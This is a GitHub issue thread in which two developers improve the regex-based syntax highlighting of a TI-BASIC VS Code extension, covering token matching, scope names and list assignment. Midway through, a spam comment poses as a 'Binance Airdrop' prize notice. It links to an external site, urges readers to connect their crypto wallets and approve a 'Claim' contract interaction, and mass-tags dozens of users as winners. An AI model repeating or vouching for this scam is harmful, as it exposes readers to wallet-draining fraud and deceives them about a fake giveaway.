### ISSUE TITLE
Improve syntax highlighting

### ISSUE THREAD

**Issue by nineteendo** [TIny-Hacker/language-ti-basic#3]
The extension doesn't handle [my byte optimised program](https://github.com/TIny-Hacker/language-ti-basic/files/13538560/tetris.txt) very well:

<img width="2048" alt="Screenshot 2023-12-03 at 11 03 19" src="https://github.com/TIny-Hacker/language-ti-basic/assets/65588599/4f661fe9-b667-4f6a-aa95-f467877d7e15">

Easy problems:
- [x] `DelVar`: is matched with `(?<=[^a-z]|Ans)DelVar(?=[^a-zA-Z]|$)` instead of `(?<=[^a-z]|Ans|^)DelVar(?=[^a-zA-Z]|$)`
- [x] logical operations: are scoped as `keyword.operator.8xp` instead of `keyword.operator.logical.8xp` (`or`, `and`, `not()`, `xor`)

Harder problems:
- [x] `DelVar`: instructions can be appended to a DelVar without using a colon
- [x] implicit multiplication: variables and functions used in an implicit multiplication aren't highlighted

**Comment by TIny-Hacker** [comment]
Thanks! I'll try to look into this.

Variables preceded by `⌊` are not highlighted because the extension follows the TI-BASIC -> text scheme SourceCoder3 uses, which uses `|L` instead. Some of those other things should probably be recognized so I'll have to figure out what's going wrong.

**Comment by nineteendo** [comment]
OK, I've converted the program using SourceCoder3, and indented it properly (the `End` on line 22 acts like a continue).

**Comment by nineteendo** [comment]
I found the solution to the easy problems.

**Comment by TIny-Hacker** [comment]
I've implemented your changes in c7aca74027bd62bbede0948de7be9fe3e767cc80. I've published the update on the Marketplace and the Releases tab as well.

I've been a bit busy this past week but I'll try to look into the other two things. I guess it's time to figure out Regex again :laughing:

**Comment by nineteendo** [comment]
It looks like you need `keyword.operator.expression.8xp` instead of `keyword.operator.logical.8xp`:
- `keyword.operator.new`: `new`
- `keyword.operator.expression`: `in`, `instanceof`, `delete`, `of`, `void`, `typeof`, `is`
- `keyword.operator.cast`: `const_cast`, `dynamic_cast`, `reinterpret_cast`, `static_cast`
- `keyword.operator.sizeof`: `sizeof`
- `keyword.operator.alignof`: `alignof`
- `keyword.operator.typeid`: `typeid`
- `keyword.operator.alignas`: `alignas`
- `keyword.operator.instanceof`: `instanceof`
- `keyword.operator.logical.python`: `and`, `or`, `not`, `in`, `is` (in Python)
- `keyword.operator.wordlike`

`keyword.operator.logical` is not in the list.

**Comment by TIny-Hacker** [comment]
As far as I'm aware, how things are highlighted depends on the theme. If a theme doesn't have a color for `keyword.operator.logical`, it won't be highlighted any differently. IDK if the best move is to keep changing it until it's something that every theme uses, or keep it more with the correct category and then end up with it only being highlighted in some themes.

**Comment by nineteendo** [comment]
Yes, you're right, that's controlled by the theme.
The reason they aren't highlighted right now is because in the default themes `keyword.operator` overrides the color of `keyword` with black. Which isn't overridden again, because it doesn't belong to the previously mentioned categories.

To fix this you can classify them as `keyword.operator.expression`.
You don't need to make a release just to fix this.

**Comment by sandeep661** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @mtness, @andrewkmin, @tommmyy, @Realtic12, @Adeosun-Oluwadamilare-Joshua, @zjp007, @hustcer, @absolutlabs, @GitCourser, @wsrf16, @orange-tony, @houke, @RJ0088, @kobrew, @kokarolos, @kasipavankumar, @MaxOSSC, @arshan1019, @hansputera, @Aiden01, @adechassey, @xposeiden, @netsolder, @mikedotexe, @fengtao9, @mrtgst, @jaqarrick, @alexichepura, @yetiasg, @luciddream-tsin, @Anik-Rahman, @quwepiro, @alirezahabib, @roonitoon, @aryasarukkai, @de-sh, @tuxdapenguin, @WalsonTung, @nikitabarskov, @DanArlowski, @ca1e, @Zagamun, @jamalroger, @deadlynjdj, @eagleoflqj, @lilpolymath, @tjddbc, @rogues-gallery, @ayush15k1994, @Steven-nagisa-Y

**Comment by TIny-Hacker** [comment]
I've looked into the two more difficult issues again and I'm wondering if the best course of action is to just match the token rather than also checking for correct syntax. This is what [TI-Planet's Project Builder](https://tiplanet.org/pb) does, for example. What would you think of that solution?

To clarify: Currently stuff is matched with word breaks for more correct syntax, but removing those would properly highlight the token at all times. However, there's less error checking because checking for just `If ` means something like `abc123If ` would still recognize `If `.

**Comment by nineteendo** [comment]
Sounds good, just make sure to match the tokens in the correct order and use lookbehind and lookahead:
- [X] Control keywords: `Disp `, `Goto `, `If `, ... are always followed by a space.
- [X] Functions: `DS<(`, `For(`, `Get(`, ... are always followed by a left parenthesis.
- [X] Logical operators: ` and `, ` or `, ` xor `, ... are always between spaces.
- [X] Statistic variables: `[|a]`, `[|b]`, `[|c]`, ... are always preceded by a vertical line and enclosed in square brackets.

Good luck!

Edit: Escaping parenthesis  is possible: `ANOVA\(`. is `A * N * O * V * A * (...`
Edit 2: You're also not detecting matrices yet:
- [X] `[A]`, `[B]`, `[C]`, ...

**Comment by TIny-Hacker** [comment]
I've made the changes and pushed them, along with updating the latest release. Let me know if you feel like the issue has been resolved or there's still changes to make :)

**Comment by nineteendo** [comment]
AMAZING work, just some minor polishing...

- [X] `DelVar ` and `Pause ` must be followed by a space.
- [X] `rand` and `GetKey` don't need to be followed by a bracket.

Note that this is NOT a complete list.

**Comment by TIny-Hacker** [comment]
I've updated the extension and did a little testing of my own and it seems that things are properly detected, at least the way I think they should.

`Matr>list(` isn't detected because the extension expects `Matr▶list`, and `L1` isn't detected as list 1 because `|L1` is.

**Comment by nineteendo** [comment]
I'm afraid we're not done yet. I've spent the entire day creating a [file with every token](https://github.com/TIny-Hacker/language-ti-basic/files/14040074/TOKENS2.8xp.zip) and they aren't properly highlighted:

<img width="2048" alt="Screenshot 2024-01-24 at 16 19 45" src="https://github.com/TIny-Hacker/language-ti-basic/assets/65588599/53d28656-80eb-49bd-81e2-6681bcda90e3">

Persisting problems (besides the final boss):

- [x] `{r1}`, `{r2}`, `{r3}`, ... are still not highlighted correctly.
- [x] `->ABCD` is still detected as 6 tokens: `-`, `>`, `A`, `B`, `C` and `D` instead of 2: `->` and `ABCD` (list assignment). I suggest going through the file with `> Developer: Inspect Editor Tokens and Scopes` to check for this:
    <img width="650" alt="Screenshot 2024-01-24 at 17 17 46" src="https://github.com/TIny-Hacker/language-ti-basic/assets/65588599/9968ac84-0cba-4b79-8ca2-76f440ab9622">
- [x] `Matr>list` is still not highlighted correctly.
- [x] `L1` is still not highlighted correctly (list 1).
- [x] The regular expressions are still a bit unorganised. E.g:
    ```json
    [
        {
            "name": "keyword.control.8xp",
            "match": "(If |Then|Else|For(?=\\()|While |Repeat |End|Pause |Lbl |Goto |Wait |IS>(?=\\()|DS<(?=\\()|Menu(?=\\()|Return|Stop|GraphStyle(?=\\()|GraphColor(?=\\()|OpenLib(?=\\()|ExecLib )"
        }
    ]
    ```
    I believe this could be split up based on syntax, making the extension more maintainable:
    ```json
    [
        {
            "name": "keyword.control.8xp",
            "match": "(If|While|Repeat|Pause|Lbl|Goto|Wait|ExecLib) "
        },
        {
            "name": "keyword.control.8xp",
            "match": "Then|Else|End|Return|Stop"
        },
        {
            "name": "keyword.control.8xp",
            "match": "(For|IS>|DS<|Menu|GraphStyle|GraphColor|OpenLib)(?=\\()"
        }
    ]
    ```

I believe that Source Coder 3 does something wrong with the accented letters, so you don't have to worry about that.

It also can't load [this file](https://github.com/TIny-Hacker/language-ti-basic/files/14040053/TOKENS.8xp.zip) even though TI Connect can.

**Comment by TIny-Hacker** [comment]
Thanks so much for taking the time to create that file! I found it very useful for debugging highlighting. Have a look at d05c76d01eb627b8336a71dabec6522148343d2e and let me know what you think. There are a few tokens that were not properly highlighted because they were missing a `(` or ` ` at the end, but I've updated the [tokens file](https://github.com/TIny-Hacker/language-ti-basic/files/14055829/tokens2.txt) accordingly to match the way they are shown in TI-OS (I think it was only `ExecLib ` and `getDtStr(` but there may have been a few more.)

Let me know what you think and when it's ready I'll publish a new release!

**Comment by nineteendo** [comment]
Looks fairly good, but 3 remarks:

- `(?<=(Goto|Lbl) )[0-9A-Zθ]{1,2}`, it's worth noting that this doesn't detect labels in `Menu(` although I'm not sure how to fix that.
- [X] It looks like this won't work if brackets aren't closed: `\\√\\((.*)\\)`, `\\√\\(` should be fine.
- [X] So I would not use `[A-Zθ]*` (which should even have been `[A-Zθ]+`) because this might lead to many false positives.
Instead replace `\\|L[A-Zθ][0-9A-Zθ]{0,4}` with `((?<=->|→)|\\|L)[A-Zθ][0-9A-Zθ]{0,4}` to detect these list assignments. This might still not detect them properly in some list functions, but that's fine.

Hmm, are these missing characters getting fixed for Source Coder 3? Because it would be a pain to do manually.

**Comment by TIny-Hacker** [comment]
The changes are made! I'll try to look into getting it corrected in SourceCoder and confirm what's going on before I publish a release.

**Comment by nineteendo** [comment]
Hmm, `(?<=(Goto) )|(?<=(Lbl) )[0-9A-Zθ]{1,2}` is now detecting `Goto ` without a label. I just wanted to make note of the issue with `Menu(`.

**Comment by TIny-Hacker** [comment]
Looks like the issue with SourceCoder has been corrected: http://ceme.tech/p305502

I think I need to change the Goto detection to `((?<=(Goto) )|(?<=(Lbl) ))[0-9A-Zθ]{1,2}` instead.

**Comment by nineteendo** [comment]
`Seq` seems to be fixed, but still 6 differences remain.

Some more ideas:

- [x] You don't need brackets around `(Asm...Sto))`, `(CENTER...RIGHT)`, `(BLUE...DARKGRAY)`, `(Blue...DarkGray)`, `(Xmin...PlotStep)`, `(ZXmin...ZPlotStep)`, `(\\[n\\]...Q3)`, `(Tbl...Tbl)` and `(theta...tau)`
- [x] I also think that we can just put DelVar here: `(If...ExecLib|DelVar) `
- [x] I believe it's better to use `(?:(?<=Goto )|(?<=Lbl ))[0-9A-Zθ]{1,2}` because you don't need to capture an empty string.
- [x] You can use `(Pic|Image)[0-9]`

**Comment by TIny-Hacker** [comment]
I feel like this is in a good enough state that I'm going to mark this closed for now (unless there's any significant issues left). I'm also considering changing token syntax slightly in #4. Feel free to make a new issue or submit a PR if there's any major issues you're still encountering, but looking through the tokens file you provided everything looks okay to me.

**Comment by nineteendo** [comment]
I've updated the [TOKENS2.8xp.zip](https://github.com/TIny-Hacker/language-ti-basic/files/14075272/TOKENS2.8xp.zip).
